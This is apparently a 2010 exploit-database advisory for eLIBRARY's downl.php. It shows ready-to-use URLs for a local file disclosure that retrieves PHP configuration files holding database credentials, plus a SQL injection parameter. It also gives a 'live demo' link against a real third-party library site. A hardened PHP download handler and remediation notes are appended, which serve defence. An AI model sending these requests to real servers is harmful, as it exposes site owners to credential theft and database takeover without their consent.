
[webapps / 0day] - eLIBRARY (downl.php) Local File Disclosure

Posted on 16 December 2010

==========================================================
eLIBRARY (downl.php) Local File Disclosure / SQL Injection
==========================================================

# Exploit Title      : eLIBRARY (downl.php) Local File Disclosure + SQL Injection
# Web                : http://elibrary.ru
# Date               : 14 December 2010
# Author             : Sudden_death
# Platform/Tested on : Windows XP Professional SP 2
# myweb              : http://sudden.isgreat.org
======================================================================

SQL Injection

http://127.0.0.1/zin_sar.phtml?id=[SQLi]

parameter zin_sar.phtml or etc.

[#]-------------------------------------------------------------------

File Disclosure

# look source downl.php

.........
// downloading a file use http://somewhere.com/download.php/?filename=name of file
$filename = $_GET['filename'];
..........

# once we know the configuration, let us download the "index.php" or "jungtis.php"

[*] see the source of the index.php

.........
global $db_link, $isreg;
$db_link = mysql_connect('localhost','name_user','pass_db') or die ("error!");
mysql_select_db('db_name',$db_link) or die("Neradau DB");
.........

[*] see the source of the jungtis.php

..........
class DB {
function DB1() {
$this->host = "localhost";
$this->db = "db_name";
$this->user = "name_user";
$this->pass = "pass_db";
$this->link = mysql_connect($this->host, $this->user, $this->pass);
mysql_select_db($this->db);
.........

# vuln

http://127.0.0.1/downl.php?filename=index.php
or
http://127.0.0.1/downl.php?filename=jungtis.php

# live demo

SQLi

File Disclosure
http://www.ebiblioteka.eu/downl.php?filename=jungtis.php

[#]-------------------------------------------------------------------

Greets :| bumble_be | kiddies | patriot | Mr.SoOofe | petimati | white hat | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito | james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip | angga | demnas | ELV1N4 | jonathan | virgi | wenkhairu | jos_ali_jo | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | Jimmy | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 | r4tu_le64h | cruzen | ranggamagic | Mbah_semar | and all crew's |

Special thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | makassarhacker.com ]

[#]-------------------------------------------------------------------

note : do not say everything you know, but know everything you say!

# 1337db.com [2010-12-16]
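The downl.php excerpt above passes `$_GET['filename']` straight to the download logic, which is why the application's own PHP sources can be fetched. The following is an added example of a hardened handler, not code from the advisory or from eLIBRARY; the download directory, the extension allowlist and the helper name `resolve_download` are assumptions.

```php
<?php
// Added example (PHP 7.1+): hardened form of the downl.php pattern quoted above.
// DOWNLOAD_ROOT, ALLOWED_EXT and resolve_download() are hypothetical names,
// not taken from the eLIBRARY code base.
const DOWNLOAD_ROOT = '/var/www/elibrary/files'; // assumed: holds only public documents
const ALLOWED_EXT   = ['pdf', 'djvu', 'txt'];    // assumed allowlist; never php/phtml/inc

/** Map a user-supplied name to a file inside $root, or return null. */
function resolve_download(string $requested, string $root = DOWNLOAD_ROOT): ?string
{
    // Plain file names only: no slashes, backslashes, NUL bytes or quotes.
    if (!preg_match('/\A[A-Za-z0-9._-]{1,128}\z/', $requested)) {
        return null;
    }
    // Extension allowlist: index.php and jungtis.php are rejected here.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    // Canonicalise and confirm the result is still under the download root
    // (catches symlinks that point outside it).
    $base = realpath($root);
    $path = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

$raw  = $_GET['filename'] ?? null;                  // may be absent or an array
$path = is_string($raw) ? resolve_download($raw) : null;
if ($path === null) {
    http_response_code(404);                        // same answer for every rejection
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
```

With this handler, requests for index.php or jungtis.php fail the extension check before any path is built. Because the advisory shows those files holding database credentials, moving the credentials out of the web root and rotating them is the companion step.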

 
